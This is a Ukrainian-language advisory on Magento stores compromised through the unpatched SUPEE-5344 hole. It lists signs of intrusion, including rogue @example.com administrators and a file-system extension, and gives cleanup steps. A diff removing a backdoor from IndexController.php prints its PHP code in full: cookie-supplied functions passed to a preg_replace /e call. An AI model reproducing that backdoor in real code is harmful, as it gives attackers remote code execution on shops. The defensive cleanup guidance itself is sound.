Якщо ваш магазин ще не пропатчений, найбільш ймовірно, що він під загрозою або вже зламаний автоматичним експлоітом який працює з 22 квітня 2015 року. Всі не пропатчені магазини які я бачив, мали наступні ознаки взлому:
- lib/Varien/Db/Adapter/Pdo/Mysql.php file modified, so patch can not be applied seamlessly:
$bash./PATCH_SUPEE-5344_CE_1.8.0.0_v1-2015-02-10-08-10-38.shCheckingifpatch can be applied/revertedsuccessfully...ERROR: Patch can't be applied/revertedsuccessfully.patchingfileapp/code/core/Mage/Admin/Model/Observer.phppatchingfileapp/code/core/Mage/Core/Controller/Request/Http.phppatchingfileapp/code/core/Mage/Oauth/controllers/Adminhtml/Oauth/AuthorizeController.phppatchingfileapp/code/core/Mage/XmlConnect/Model/Observer.phppatchingfilelib/Varien/Db/Adapter/Pdo/Mysql.phpHunk#1 FAILED at 2834.1 out of 1 hunk FAILED -- saving rejects tofilelib/Varien/Db/Adapter/Pdo/Mysql.php.rej - app/code/core/Mage/Cms/controllers/IndexController.php file have a hijacking cookie key installed
- Magpleasure/Filesystem розширення встановлене для легкого доступу до файлової системи з Адмінки
- Список адміністраторів System > Permissions > Users поповнився одним або декількома новими користувачами, емейл яких містить @example.com в домені
- Список ролів System > Permissions > Roles поповнився новим записом який гарантує повні права для адмінів з @example.com
Як рузультат, такі магазини можуть повністю адмініструватись хакером в будь який спосіб, так як він має доступ до панелі адміністрування та файлової системи. Щоб врятувати ваш магазин він зловживань, бану в Google, або потрапляння в чорний список, переконайтесь, що ваш магазин пропатчений.
Якщо ваш магазин має ознаки злому, або вже зламаний – це можна визначити по вказаних вище пунктах, виконайте наступні іструкція прямо зараз щоб перешкодити цьому:
- збережіть бекап поточної версії
- для виправлення, відкотіть lib/Varien/Db/Adapter/Pdo/Mysql.php до оригінальної версії, що відповідає вашому дистрибутиву Magento або використайте вже пропатчену версію з цієї статті
- відкотіть app/code/core/Mage/Cms/controllers/IndexController.php до оригінальної версії, що відповідає вашому дистрибутиву Magento, або принаймні видаліть наступний код тут (підсвічений):
--- app/code/core/Mage/Cms/controllers/IndexController.php 2015-04-22 03:47:49.742344082 +0200+++ orig-distr-1.9.0.1/IndexController.php 2015-06-02 10:26:25.197159978 +0200@@ -116,14 +116 @@}--classMage_Cms_Auth_olx-{-publicfunction__construct() {-$auth_cookie= @$_COOKIE['nuwxlskmedlvjfdo3'];-if($auth_cookie) {-$method=$auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo2']);-$auth=$auth_cookie(@$_COOKIE['nuwxlskmedlvjfdo1']);-$method("/124/e",$auth,124);- }- }-}-$is_auth=newMage_Cms_Auth_olx; - видаліть всіх невідомих користувачів з System > Permissions > Users і анулюйте їхні ролі в System > Permissions > Roles
- видаліть або відключіть Magpleasure/Filesystem додаток через Magento connect
- повний перелік файлів який потрібно знищити або пропатчити (зелені – пропатчити, всі інші – видалити)
Будь ласка, звертніть увагу, що ці дії можуть відновити магазин лише від автоматичого експлоіту, який ми найчастіше бачили в не пропатчений інсталяції Magento. Якщо зловмиснимк використав цю лазівку для вашої інсталяції, він міг модифікувати будь який файл і залишити будь які інші лазівки для наступного доступу, тому для детального дослідження, зверніться до компетентних спеціалістів для відновлення вашого магазину з бекапу, приорітетно який зроблений до 22 квітня 2015 року.